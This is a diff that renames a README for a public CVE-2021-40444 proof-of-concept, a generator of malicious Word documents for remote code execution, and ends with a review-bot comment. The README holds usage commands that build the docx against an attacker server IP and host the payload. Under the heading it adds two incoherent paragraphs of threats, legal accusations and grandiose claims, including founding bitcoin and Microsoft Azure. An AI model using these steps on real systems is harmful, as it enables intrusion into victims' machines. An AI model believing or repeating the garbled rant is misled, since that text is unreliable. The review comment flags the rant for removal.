29 changes: 0 additions & 29 deletions README.md

This file was deleted.

30 changes: 30 additions & 0 deletions README.md.shame
@@ -0,0 +1,30 @@
# CVE-2021-40444 PoC
Shame for the hacker that responsible for giving out my company classified documentation will most likely be station by the federal give and I might file a lawsuit out on you group as well . .Those of don't know who I am allow me to introduce myself . They call me the laptop from he'll . Founder of bitcoin and Microsoft azure, Microsoft devops etc and More . I build software today that main job is to track all hacker movements on the web stage one. Tag your illegal code for late assign a bot to your case file . Once you tagged by my software your tagged for life . Why because the bot can remember how your style of coding . Every hacker has a strace evidence keystrokes . Meaning when you type anything on a computer code forensic DNA is left behind . As well once tagged you will leave forensic blue matter ever you go . Kind like a die pack . Give me back what you took from me know . This platform software nothing like what I really have planned you .
Get control of my bitcoin company .. And place a price tag on every share and stock . Fire all the hacker and developers on the crypto market and also charge them 100 a month free to use the exchange . For all the rapper and famous actors on that picture stripe then from executive privilege and you and 4 other CEO can help me run the company. As you know those actors and rapper that use that platform new it was part of a wisleblower payout . And they new that I endorsed for a retirement reinvestment strategy for low income family bloodline ect . For this new team don't file charges against there actors that made my payouts unto a personal bank account to pay me one million a peace . By march 22 2025 .
Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (`sudo apt-get install lcab`)

Check `REPRODUCE.md` for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab

# Using

First generate a malicious docx document given a DLL, you can use the one at `test/calc.dll` which just pops a `calc.exe` from a call to `system()`

`python3 exploit.py generate test/calc.dll http://<SRV IP>`

![Document generation](./img/gen.png)

Once you generate the malicious docx (will be at `out/`) you can setup the server:

`sudo python3 exploit.py host 80`

![Server](./img/srv.png)

Finally try the docx in a Windows Virtual Machine:

![Pop Calc](./img/calc.png)
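
Review bot: The two paragraphs inserted directly under the `# CVE-2021-40444 PoC` heading (new lines 2 and 3 of `README.md.shame`) are not project documentation: they contain accusations, threats of legal action and personal claims that have nothing to do with the generator, the `lcab` dependency or the usage steps that follow, and they push the actual description ("Malicious docx generator to exploit CVE-2021-40444 ...") below unrelated text. Drop both paragraphs. The same change also deletes `README.md` and re-adds the content as `README.md.shame`, which leaves the repository without a README under its conventional name while `REPRODUCE.md` and the `img/` references still assume the original layout; keep the file name as `README.md`. With those two points addressed the change has no remaining content, so it should be closed rather than merged.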